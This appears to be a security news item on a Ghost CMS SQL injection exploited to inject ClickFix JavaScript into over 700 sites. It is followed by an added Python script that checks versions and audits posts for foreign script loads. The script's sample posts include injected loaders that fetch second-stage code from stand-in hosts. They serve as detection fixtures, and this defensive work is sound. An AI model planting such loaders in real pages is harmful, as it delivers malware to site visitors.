Ghost CMS Vulnerability Exploited in Large-Scale ClickFix Campaign Affecting Over 700 Domains
A critical SQL injection vulnerability in Ghost CMS, tracked as CVE-2026-26980, is being exploited in a large-scale campaign that injects malicious JavaScript to trigger ClickFix attack flows. Discovered by XLab threat intelligence researchers at Qianxin, the campaign has affected over 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs. The vulnerability affects Ghost versions 3.24.0 through 6.19.0 and allows unauthenticated attackers to read the site database, including admin API keys. Although a fix was released in February 2026, many sites have not updated and remain exposed.

Attackers use the stolen admin API keys to inject malicious JavaScript into articles. When a visitor loads an affected article, that code fetches second-stage code from the attacker's infrastructure, which displays a fake Cloudflare prompt and serves as the entry point of the ClickFix flow.
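For a site owner checking whether their Ghost install falls in the affected range and whether any article already carries injected script, the following is an added example (not code from the article or from the Ghost project). It checks a version string against the 3.24.0 to 6.19.0 range named above, and it audits post records shaped like Ghost Admin API post objects (the `html`, `codeinjection_head` and `codeinjection_foot` fields are real Ghost post fields) for `<script>` sources or inline loaders that reference hosts outside an allowlist. The sample posts, the `blog.example` allowed host and the `*.example` attacker hosts are constructed for the demonstration and are not indicators from the campaign.

```python
"""Audit Ghost posts for script loads from unexpected hosts and check a
Ghost version against the affected range named in the article."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Affected range as stated in the article (inclusive bounds).
AFFECTED_MIN = (3, 24, 0)
AFFECTED_MAX = (6, 19, 0)


def parse_version(ver: str) -> tuple:
    """'v6.19.0' -> (6, 19, 0); tolerates a leading 'v' and pre-release tags."""
    core = ver.lstrip("v").split("-")[0].split("+")[0]
    parts = [int(p) for p in core.split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected_version(ver: str) -> bool:
    """True if the version lies within 3.24.0 .. 6.19.0 inclusive."""
    return AFFECTED_MIN <= parse_version(ver) <= AFFECTED_MAX


class _ScriptCollector(HTMLParser):
    """Collects <script src=...> values and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.srcs = []       # external script URLs
        self.inline = []     # inline script bodies
        self._buf = None     # body of the <script> currently being read

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


# Absolute http(s) URLs inside inline script text (a second-stage fetch).
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def _host(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def find_foreign_script_loads(post: dict, allowed_hosts) -> list:
    """Return (field, host, snippet) findings for one Ghost-style post dict.
    Relative script paths have no host and are never flagged."""
    findings = []
    allowed = {h.lower() for h in allowed_hosts}
    for field in ("html", "codeinjection_head", "codeinjection_foot"):
        content = post.get(field) or ""
        if not content:
            continue
        parser = _ScriptCollector()
        parser.feed(content)
        for src in parser.srcs:
            url = "https:" + src if src.startswith("//") else src
            host = _host(url)
            if host and host not in allowed:
                findings.append((field, host, src[:80]))
        for body in parser.inline:
            for url in URL_RE.findall(body):
                host = _host(url)
                if host and host not in allowed:
                    findings.append((field, host, url[:80]))
    return findings


def audit_posts(posts, allowed_hosts=("blog.example",)) -> dict:
    """Map post id -> findings for every post with at least one finding."""
    report = {}
    for post in posts:
        hits = find_foreign_script_loads(post, allowed_hosts)
        if hits:
            report[post["id"]] = hits
    return report


# Constructed sample posts (not real Ghost export data or campaign IoCs).
SAMPLE_POSTS = [
    {"id": "p1", "title": "Clean post",
     "html": '<p>Hello</p><script src="/assets/site.js"></script>',
     "codeinjection_head": None, "codeinjection_foot": None},
    {"id": "p2", "title": "Tampered footer injection",
     "html": "<p>Intro</p>", "codeinjection_head": None,
     "codeinjection_foot": '<script src="https://cdn.second-stage.example/loader.js"></script>'},
    {"id": "p3", "title": "Inline loader in article body",
     "html": "<p>x</p><script>var s=document.createElement('script');"
             "s.src='https://stage2.example/p.js';document.body.appendChild(s)</script>",
     "codeinjection_head": None, "codeinjection_foot": None},
]

if __name__ == "__main__":
    for pid, hits in audit_posts(SAMPLE_POSTS).items():
        for field, host, snippet in hits:
            print(f"{pid}: {field} references {host}: {snippet}")
    print("6.19.0 affected:", is_affected_version("6.19.0"))
```

To run this against a live site, pull posts with the Admin API (the `posts` endpoint with `formats=html`) into the same dict shape, put the site's own hostname and any CDN you legitimately use in `allowed_hosts`, and treat every finding as something to inspect rather than auto-remove, since themes and analytics often add third-party scripts on purpose.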